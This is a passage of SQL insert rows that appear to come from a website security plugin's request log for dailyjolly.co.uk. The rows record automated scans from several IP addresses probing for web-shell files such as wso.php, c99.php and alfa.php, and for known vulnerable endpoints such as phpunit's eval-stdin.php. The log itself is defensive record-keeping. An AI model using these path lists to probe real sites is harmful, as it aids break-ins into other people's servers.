,19,0),('217.160.238.12',3651202572,'',0,1673997145.9392,55,'ISATs2MFc7rBRZ6WN9btuaYH','','19|0|0|0|www.dailyjolly.co.uk/modules/modules/modules.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997148.6791,55,'aQ5xlbGjhDtZ1UMKIgdNTs8Y','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/Clean.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997150.7857,55,'BW7tT2fvLQ6pOyqgZbkUC1Go','','19|0|0|0|www.dailyjolly.co.uk/modules/mod_simplefileuploadv1.3/elements/udd.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997153.9183,55,'2WX1jfgPUDFsInzrio7LOa6m','','19|0|0|0|www.dailyjolly.co.uk/libraries/joomla/css.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997155.7850,100,'3PTc6s8dRA2r5Bf4MO1WzIxX','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmails.php',0,13,0),('217.160.238.12',3651202572,'',0,1673997158.9347,100,'DCK1I925OyjL6nmVlB0xbGJ7','','13|0|0|0|www.dailyjolly.co.uk/libraries/joomla/jmail.php',0,13,0),('217.160.238.12',3651202572,'',0,1673997161.9373,55,'FG67YZoAbseEm8q4vWkz3xnN','','19|0|0|0|www.dailyjolly.co.uk/images/vuln.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997164.9780,55,'TlAa1cQSuymHMLnZNGwpOVqJ','','19|0|0|0|www.dailyjolly.co.uk/tmp/vuln.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997167.5926,55,'sFvAdcjihO69yHaNR3tMnlDK','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997169.4346,55,'u0zKRLU6Y1iInvp5NkHrOfqG','','19|0|0|0|www.dailyjolly.co.uk/Marvins.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997171.9587,100,'wOjRBFP5a7DVb34ErZvTenUH','','13|0|0|0|www.dailyjolly.co.uk/rxr.php',0,13,0),('217.160.238.12',3651202572,'',0,1673997173.9525,55,'0H8NKEjGwoBFMrTDv3QbfkpU','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997176.8061,55,'pADcCYRjrEa37svSMt5Ud1fl','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997179.8463,55,'IX76YVUQdHTZfn82Fw3GoNvs','','19|0|0|0|www.dailyjolly.co.uk/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997182.4195,55,'zbfyDjNmVQsT54RWug0MLlAk','','19|0|0|0|www.dailyjolly.co.uk/RxR.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997190.2399,55,'E2aT971jomqAUlpCDfMLhxQ0','','19|0|0|0|www.dailyjolly.co.uk/components/com_b2jcontact/izoc.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997192.3945,55,'5S971khUVxAIs3RM4DonjXdQ','','19|0|0|0|www.dailyjolly.co.uk/V3.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997194.8319,55,'YzSy4nWrx7meDTMZFqokBwH5','','19|0|0|0|www.dailyjolly.co.uk/V5.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997201.9093,55,'UF6GTIOAgNYotZhpxB5r34id','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997204.8122,55,'IUKuGFTJ0RQwyOmEqCeMx2zH','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997207.2504,55,'OKJVBNHXgYsAuGheDTbqt3xI','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997210.1468,55,'H4IC0Yf7XwDa63vFqGQhVMmL','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997212.3082,55,'CelU8tzrJ3fYgKM2PaSNIXyw','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/bluestork/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997215.5039,55,'yT6C40FvGQcaDndRsSWgPlK9','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997218.3458,55,'i1SXEw3jYl72QcagyCOrnhG0','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/hathor/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997220.5932,55,'rfiVYxj1dSEm8oRwp4lyqGnL','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997223.1194,55,'yYH6txhRGrdQ1zJCwBKXk5ZU','','19|0|0|0|www.dailyjolly.co.uk/administrator/templates/isis/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997225.2599,55,'NI6U1rXE72sVoq5CnWkJMlZe','','19|0|0|0|www.dailyjolly.co.uk/templates/beez/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997227.1192,55,'I9MbK0YPwad7BJoQTWNDqAeR','','19|0|0|0|www.dailyjolly.co.uk/templates/ja_purity/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997229.2009,55,'sMKQWSCnZuPqYLeO9moBJpTc','','19|0|0|0|www.dailyjolly.co.uk/templates/rhuk_milkyway/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997231.3364,55,'vV5Joz87GwFkuTIyYUdAbhQB','','19|0|0|0|www.dailyjolly.co.uk/templates/system/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997233.1278,55,'wOQjbKqRY5AzJTpiaLurgdXs','','19|0|0|0|www.dailyjolly.co.uk/templates/system/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997235.6137,55,'9jVu3R6Hyl1wWioh2MBAYQxG','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997238.8443,55,'73IOq8mhQvgA6CPKB4EdsSbw','','19|0|0|0|www.dailyjolly.co.uk/templates/beez3/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997240.1454,55,'HQXJPEle3vDBk5FzxId0G8VR','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997242.9267,55,'fA5n04q1wpjhLH8iDve93MWy','','19|0|0|0|www.dailyjolly.co.uk/templates/beez5/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997245.1160,55,'ZcfFUM4LhtH925BgsRq81lJw','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997247.8056,55,'d6rNCFWzw7Ie4imZ9k5vRMf8','','19|0|0|0|www.dailyjolly.co.uk/templates/beez_20/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997250.1467,55,'9RtJY0msQZOjexF24rpugWiA','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997252.3933,55,'l2VAjnmzYB6ZLqdE81Dh4O9a','','19|0|0|0|www.dailyjolly.co.uk/templates/protostar/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997255.0173,55,'98evq2g75m6DocLC4WxbMQkO','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/index.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997256.8970,55,'RM9oQc6VdmbYg2kyt04Wqa3f','','19|0|0|0|www.dailyjolly.co.uk/templates/atomic/error.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997259.6072,55,'tCkDIZM70pl3BbWLvxEgsJPq','','19|0|0|0|www.dailyjolly.co.uk/olux.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997261.9473,55,'MydkNGHw79nxKYUPcjq6esQi','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997264.3443,55,'7ND0YMjKLHIeG5x8nBQT3c4f','','19|0|0|0|www.dailyjolly.co.uk/indoxploit.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997266.9252,55,'zqLfeQY9SoGih6x8uMFXNtwR','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997291.0522,55,'ceUzph1WnJrXySVv0ouQFTbL','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997292.1755,55,'VOd564REUAQ8kHo0aZXMm3pi','','19|0|0|0|www.dailyjolly.co.uk/upload.php',0,19,0),('217.160.238.12',3651202572,'',0,1673997293.9506,55,'eSgrqiQlvWhVbBj4ow1XpG25','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('146.190.84.120',2461947000,'',0,1673998830.6108,55,'jK2yMOmBGz5W0TN8Vpvigod3','','19|0|0|0|www.dailyjolly.co.uk//wp-content/admin.php',0,19,0),('20.244.36.78',351544398,'',0,1674008966.9561,55,'JiN3D2gFLbrcRU4SmyHMYvuB','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('20.244.36.78',351544398,'',0,1674009643.3563,55,'7Hs2dTRKFLao5W6v9CwAn0hz','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('20.244.36.78',351544398,'',0,1674009666.7562,55,'xDNFdP5tym40X12LbORkKJwS','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/xpwn.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014979.2875,55,'uXgxeZN9SzlUhm5WpHDyGrdR','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014982.0010,55,'CdzkFsAB4VHvXmy2x3SQK9t1','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014983.0652,55,'ISgBQzlEFkZJxh96Rrp8Advo','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014986.8139,55,'93b78E5TDMLKIaZJSgjPfO4m','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014987.2032,55,'N91O4Y7VDEIKZBfvRGuLQM28','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014987.2891,10,'N91O4Y7VDEIKZBfvRGuLQM28','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('172.174.224.29',2897141789,'',0,1674014988.6745,55,'1DGWraHcvAVUMOhQfejLiR6n','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014989.5872,55,'xOU17IwYfcGhF4HtLqpzueWX','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014989.9694,55,'mzQHGvrFR4WcYBEA6IpSVew8','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014990.8080,55,'E0kXc4syVFWw1rbjUv7OChQg','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014991.4703,55,'e6AXjFwglSaEYyRQMWBcus38','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('172.174.224.29',2897141789,'',0,1674014996.7776,100,'nA17rtYhvcyBbquEeM6sJ35a','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('172.174.224.29',2897141789,'',0,1674015001.0851,55,'aHhkzCuDWrQ3F9qsUw62x4XL','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('172.174.224.29',2897141789,'',0,1674015013.2553,55,'cuUZL59kS8P0Qj6R1JvmMzWy','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('194.32.120.174',3256907950,'',0,1674015312.5411,55,'DkUCpLwm97OMVzKsfayv5tJq','','19|0|0|0|dailyjolly.co.uk/wp-admin/imagescheckflush.php',0,19,0),('109.248.175.119',1845014391,'',0,1674015387.9762,55,'ysD5Nl2kPFIXvxSn9zKjU7Va','','19|0|0|0|www.dailyjolly.co.uk/wp-content/shell.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016530.5226,55,'04AqIprsilbxkQwVCdWcyJtE','','19|0|0|0|www.dailyjolly.co.uk/about.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016531.5103,55,'sVv7YtxBU9aTyWeE8lR5dZS3','','19|0|0|0|www.dailyjolly.co.uk/3index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016532.4785,55,'YPwc02zatUCRMB4u5KVojsmJ','','19|0|0|0|www.dailyjolly.co.uk/2index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016533.4726,55,'a9qznEVGNFJev1Hx60g3QXum','','19|0|0|0|www.dailyjolly.co.uk/C.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016534.4972,55,'mDr64Yg1xzcfvtsCwA0eQoRX','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016534.5559,10,'mDr64Yg1xzcfvtsCwA0eQoRX','','707|0|0|0|www.dailyjolly.co.uk/c.php',0,707,0),('173.255.223.188',2919227324,'',0,1674016535.5563,55,'8Oi7b4yp2XwakErU0qSnLlBG','','19|0|0|0|www.dailyjolly.co.uk/01.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016536.5889,55,'Tyius3FYOoaqLmQxeIVwMHWd','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016537.6765,55,'e2AHoNlsLXfCDxqrhK4WjaRz','','19|0|0|0|www.dailyjolly.co.uk/02.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016539.4259,55,'x3SWrcHG0TAVpb69KeuvQBaq','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016540.4998,55,'5lmQ6LDkPaZEROuhFtzqJn9x','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016541.5684,55,'nkB6S4HvKwsaDJQ5Zc8mLIpW','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016542.8826,55,'cqjTmbyJ2zA5LQ64h173tW98','','19|0|0|0|www.dailyjolly.co.uk/mini.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016543.9154,55,'VxpIPezKnl70cwFLov6TdQfW','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016544.8764,55,'DUsTfmohwgVNnK1XkHZIariW','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016545.9233,55,'OBuUs2iy1Da4e79YX3WlVKvm','','19|0|0|0|www.dailyjolly.co.uk/403.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016546.9002,55,'TdbAmHFgSzq4VMB6c5spnaRP','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016547.8749,55,'ZVesSKXoFhImv5DxiPcWMHlB','','19|0|0|0|www.dailyjolly.co.uk/admin.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016548.8399,55,'WGBeRqAQ4l9Z2N36O8hvM5mF','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016549.8759,55,'SyAH2lPuZ1TqYjONpM9QVtxe','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016550.9096,55,'ozGZgqhO8CBi2j0THbJparDM','','19|0|0|0|www.dailyjolly.co.uk/marijuana.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016551.9320,55,'kKGNS1PlqyHZMmjXuIUcR30A','','19|0|0|0|www.dailyjolly.co.uk/good.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016552.9986,55,'pIqCF7NxE31tOBgHsvPZa5y2','','19|0|0|0|www.dailyjolly.co.uk/classes.php',0,19,0),('173.255.223.188',2919227324,'',0,1674016554.0314,55,'0TRQgjsLz7KXAFYhwmiMvNbV','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019243.8011,55,'X46QcieVt0H7sq3jIlhSWOB2','','19|0|0|0|dailyjolly.co.uk/wp-admin/css/colors/blue/blue.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019244.6510,55,'q7cDxKy40uM68PeFwBQJEd3z','','19|0|0|0|dailyjolly.co.uk/wp/wp-admin/css/colors/blue/blue.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019245.3644,55,'0m3urdlyWexnZD7TfXvU4FGY','','19|0|0|0|dailyjolly.co.uk/wordpress/wp-admin/css/colors/blue/blue.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019246.0516,55,'j1ZbVKwcFiECfBYvUzqD8Why','','19|0|0|0|dailyjolly.co.uk/blog/wp-admin/css/colors/blue/blue.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019246.9775,55,'jUELSWGQHoZcvwkD8byNq7Cm','','19|0|0|0|dailyjolly.co.uk/site/wp-admin/css/colors/blue/blue.php',0,19,0),('158.69.23.79',2655328079,'',0,1674019247.0165,10,'jUELSWGQHoZcvwkD8byNq7Cm','','707|0|0|0|dailyjolly.co.uk/site/wp-admin/css/colors/blue/blue.php',0,707,0),('20.244.36.78',351544398,'',0,1674023242.9633,55,'Jdp5UnkQA4E1WNyM3fReYsHi','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('20.244.36.78',351544398,'',0,1674023271.4927,55,'j1xPokQR0Up76gtZvyb5Cwfe','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/xpwn.php',0,19,0),('20.244.36.78',351544398,'',0,1674025239.8867,55,'L2mkoG6QvxzdZc8J9KbF1uj7','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('147.78.47.230',2471374822,'',0,1674040651.1814,55,'QYMfoGreDnJqE2ky4WtiZcmS','','19|0|0|0|dailyjolly.co.uk/wp-comments.php',0,19,0),('20.10.11.51',336202547,'',0,1674051377.4397,55,'nk4KC2rVBHScZAswQyl7EMog','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('20.10.11.51',336202547,'',0,1674051377.7621,55,'H9wNWvJ17LArYbanZRKMjQx8','','19|0|0|0|www.dailyjolly.co.uk/cjakvyki.php',0,19,0),('20.10.11.51',336202547,'',0,1674051386.0968,55,'8w2KG7qS9Tbd6vPrhsaLlmnX','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/dzs-zoomsounds/savepng.php',0,19,0),('208.109.33.169',3496812969,'',0,1674057377.1933,55,'I0GFY5BbKp6m1Xw7ueZcy8af','','19|0|0|0|www.dailyjolly.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php',0,19,0),('20.244.36.78',351544398,'',0,1674057706.7746,55,'J80HpfC4AEgBNUkmwS3sVdqj','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1674057710.6071,55,'PAm8j2URLwOi5DyWYQlXIvVf','','19|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('20.244.36.78',351544398,'',0,1674057711.6364,55,'vqPpNGXWuBnocY3R86EeHkbr','','19|0|0|0|www.dailyjolly.co.uk/beence.php',0,19,0),('20.244.36.78',351544398,'',0,1674057715.8931,55,'6kIE4nUh70Opa8VjRSHZKbWw','','19|0|0|0|www.dailyjolly.co.uk/export.php',0,19,0),('20.244.36.78',351544398,'',0,1674057716.3601,55,'KXIovbSm2Q85ualnJf7WF0z6','','19|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,19,0),('20.244.36.78',351544398,'',0,1674057716.3926,10,'KXIovbSm2Q85ualnJf7WF0z6','','707|0|0|0|www.dailyjolly.co.uk/wp-content/export.php',0,707,0),('20.244.36.78',351544398,'',0,1674057718.6671,55,'aSvOWCB8eDc7JT6knIxrspFK','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/wp-atom.php',0,19,0),('20.244.36.78',351544398,'',0,1674057719.7014,55,'H2oM7UROLGTc0zDPtpriujAe','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/images/css.php',0,19,0),('20.244.36.78',351544398,'',0,1674057720.1861,55,'YfatDCLswQXR9gAWhUNqFk1x','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/css/css.php',0,19,0),('20.244.36.78',351544398,'',0,1674057721.1773,55,'V5oiGHFfnPeSKlCQ2stIX6y0','','19|0|0|0|www.dailyjolly.co.uk/defau1t.php',0,19,0),('20.244.36.78',351544398,'',0,1674057722.3085,55,'W0kAI1pXlUTHiNtscBY8ZvF2','','19|0|0|0|www.dailyjolly.co.uk/moduless.php',0,19,0),('20.244.36.78',351544398,'',0,1674057730.6718,100,'0B3Nv2poKYei7trMWkQmcCLj','','13|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/wpconfig.bak.php',0,13,0),('20.244.36.78',351544398,'',0,1674057734.9427,55,'favkhgLTwsMz4inNDUopdKAX','','19|0|0|0|www.dailyjolly.co.uk/archives.php',0,19,0),('20.244.36.78',351544398,'',0,1674057735.9815,55,'39oalLRxNvc8nA0grf7mkiPY','','19|0|0|0|www.dailyjolly.co.uk/defau11.php',0,19,0),('20.10.11.51',336202547,'',0,1674058780.8863,55,'9sLzjnoxhtg3NOuESXBclWGF','','19|0|0|0|www.dailyjolly.co.uk/wp-plain.php',0,19,0),('20.10.11.51',336202547,'',0,1674058781.5537,55,'3aPMs1uQZbnX9YFx4GBSpN08','','19|0|0|0|www.dailyjolly.co.uk/xbzntepm.php',0,19,0),('20.244.36.78',351544398,'',0,1674059090.9344,55,'K8ESWQ6s9ChjJax0wPuURitz','','19|0|0|0|www.dailyjolly.co.uk/shell4.php',0,19,0),('20.244.36.78',351544398,'',0,1674059092.1432,55,'yzqCvEAVQnhZlHioewNM396k','','19|0|0|0|www.dailyjolly.co.uk/ups.php',0,19,0),('20.244.36.78',351544398,'',0,1674059093.3236,55,'VxK8NFuhe10SazfTq7grZvpk','','19|0|0|0|www.dailyjolly.co.uk/ru.php',0,19,0),('20.244.36.78',351544398,'',0,1674059094.5300,55,'K7TnjsXLI64faSDoMFHwGlcp','','19|0|0|0|www.dailyjolly.co.uk/if.php',0,19,0),('20.244.36.78',351544398,'',0,1674059095.6858,55,'VrKWDLtRT1U8bJspyk9MihCo','','19|0|0|0|www.dailyjolly.co.uk/vuln.php',0,19,0),('20.244.36.78',351544398,'',0,1674059096.8514,55,'JcR1iCNyThEUMVuwm3lW9PzI','','19|0|0|0|www.dailyjolly.co.uk/fw.php',0,19,0),('20.244.36.78',351544398,'',0,1674059097.9954,55,'nuYA9wNxebc0GSJydjFgLIhP','','19|0|0|0|www.dailyjolly.co.uk/skipper.php',0,19,0),('20.244.36.78',351544398,'',0,1674059099.1403,55,'s9tRNvByucY2l6CX8H1GfP3n','','19|0|0|0|www.dailyjolly.co.uk/skippershell.php',0,19,0),('20.244.36.78',351544398,'',0,1674059100.2633,55,'4Rv1GPEINYBKwOreZVS6T98b','','19|0|0|0|www.dailyjolly.co.uk/tttt.php',0,19,0),('20.244.36.78',351544398,'',0,1674059101.3763,55,'OfQZYozPl26K3NaVWt9i5Xdp','','19|0|0|0|www.dailyjolly.co.uk/tshop.php',0,19,0),('20.244.36.78',351544398,'',0,1674059102.5557,55,'G2bzpqwScluOZi6Ny9Ph7tAn','','19|0|0|0|www.dailyjolly.co.uk/alfa.php',0,19,0),('20.244.36.78',351544398,'',0,1674059103.7480,55,'NXzR0gGVvU5MtKWwHCyA3k1l','','19|0|0|0|www.dailyjolly.co.uk/shell.php',0,19,0),('20.244.36.78',351544398,'',0,1674059104.8556,55,'l6UXSYGZ497fvbOAiCxad2sF','','19|0|0|0|www.dailyjolly.co.uk/inje3ctor.php',0,19,0),('20.244.36.78',351544398,'',0,1674059106.0179,55,'XTUcex6wkOZ8bHYuP4WRFIgd','','19|0|0|0|www.dailyjolly.co.uk/saudi.php',0,19,0),('20.244.36.78',351544398,'',0,1674059107.1435,55,'32cGEUlJBuSq5CwrInsFZNiV','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('20.244.36.78',351544398,'',0,1674059108.2647,55,'OiWm9YTlzq4uQL832VEpKHhS','','19|0|0|0|www.dailyjolly.co.uk/alfashell.php',0,19,0),('20.244.36.78',351544398,'',0,1674059109.4265,55,'jHIqQT48KsrkFP103MbNlWeh','','19|0|0|0|www.dailyjolly.co.uk/my_alfa.php',0,19,0),('20.244.36.78',351544398,'',0,1674059110.6009,55,'Kilj6JrtdmfQaY8oN0XAVhkI','','19|0|0|0|www.dailyjolly.co.uk/uploader.php',0,19,0),('20.244.36.78',351544398,'',0,1674059111.7689,55,'Cl0qO1wEcg2pNs79rmHTk4iG','','19|0|0|0|www.dailyjolly.co.uk/up.php',0,19,0),('20.244.36.78',351544398,'',0,1674059112.9430,55,'Ij9YQXMqO8zdWUhaEKtv6bAD','','19|0|0|0|www.dailyjolly.co.uk/hacked.php',0,19,0),('20.244.36.78',351544398,'',0,1674059114.1405,55,'pVGOnxrf8qjIm52DdwzYPScZ','','19|0|0|0|www.dailyjolly.co.uk/c99.php',0,19,0),('20.244.36.78',351544398,'',0,1674059115.3658,55,'jAiVJBPIbRsHLlmTyWaYUwhp','','19|0|0|0|www.dailyjolly.co.uk/priv8.php',0,19,0),('20.244.36.78',351544398,'',0,1674059116.5243,55,'ACr2k7lGnOjBJfzXYqV8MWhE','','19|0|0|0|www.dailyjolly.co.uk/Navir.php',0,19,0),('20.244.36.78',351544398,'',0,1674059117.7492,55,'5WSw4zTMEZ92yviYI0DJsbaO','','19|0|0|0|www.dailyjolly.co.uk/cmd13.php',0,19,0),('20.244.36.78',351544398,'',0,1674059118.9732,55,'ixNfLIt8KrqAPmab3zeJu6dM','','19|0|0|0|www.dailyjolly.co.uk/inc20k1.php',0,19,0),('20.244.36.78',351544398,'',0,1674059120.1341,55,'giTmNYb8skd0f2XpABz4yQeZ','','19|0|0|0|www.dailyjolly.co.uk/1index.php',0,19,0),('20.244.36.78',351544398,'',0,1674059121.3008,55,'B6pO8bncGCh3xP2QgiIZT7Mf','','19|0|0|0|www.dailyjolly.co.uk/404.php',0,19,0),('20.244.36.78',351544398,'',0,1674059122.4913,55,'rEMb1cxR3iJpufHWBqKAN29e','','19|0|0|0|www.dailyjolly.co.uk/swm.php',0,19,0),('20.244.36.78',351544398,'',0,1674059123.8953,55,'35uCDiXMKSGspytq2rJIxh7e','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('20.244.36.78',351544398,'',0,1674059125.1726,55,'tZrKywIWTF3uac42PUfMXHEN','','19|0|0|0|www.dailyjolly.co.uk/doc.php',0,19,0),('20.244.36.78',351544398,'',0,1674059126.4523,55,'tnuMaq4O7Tmz3cEsfZkwIWhC','','19|0|0|0|www.dailyjolly.co.uk/shx.php',0,19,0),('20.244.36.78',351544398,'',0,1674059127.6904,55,'NPLlC9XuhsY3ftVyEaHki74O','','19|0|0|0|www.dailyjolly.co.uk/ws.php',0,19,0),('20.244.36.78',351544398,'',0,1674059128.9024,55,'whFqC0E4cd5ViZ73UReDyOu2','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('20.244.36.78',351544398,'',0,1674059130.0995,55,'UZtDajWCKHVJiGh2Tc5An3X9','','19|0|0|0|www.dailyjolly.co.uk/edit-form.php',0,19,0),('20.244.36.78',351544398,'',0,1674059131.3412,55,'C2Yzfe7Kk3619hxXnSWGMcsl','','19|0|0|0|www.dailyjolly.co.uk/LEAF.php',0,19,0),('20.244.36.78',351544398,'',0,1674059132.4879,55,'Zv2CwNOdB7fjTLJYAM43VaD0','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674059133.6275,55,'49rlNGxKLb1kXEBJHA867mYU','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.244.36.78',351544398,'',0,1674059134.7371,55,'Nx16vJbQfSpcu24lOMW8BrnF','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.244.36.78',351544398,'',0,1674059135.9435,55,'LmUt9h6JFS0PeCk4f7bvgIda','','19|0|0|0|www.dailyjolly.co.uk/Leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674059137.3620,55,'pbmFi8C3HaIhYkDnflEPgxcL','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.244.36.78',351544398,'',0,1674059138.5787,55,'Y1fWexkAwDdRFBsy8ovgTXUj','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('20.244.36.78',351544398,'',0,1674059139.7627,55,'OyvXHtR6JjDP5SLU2Fwdh4b3','','19|0|0|0|www.dailyjolly.co.uk/srx.php',0,19,0),('20.244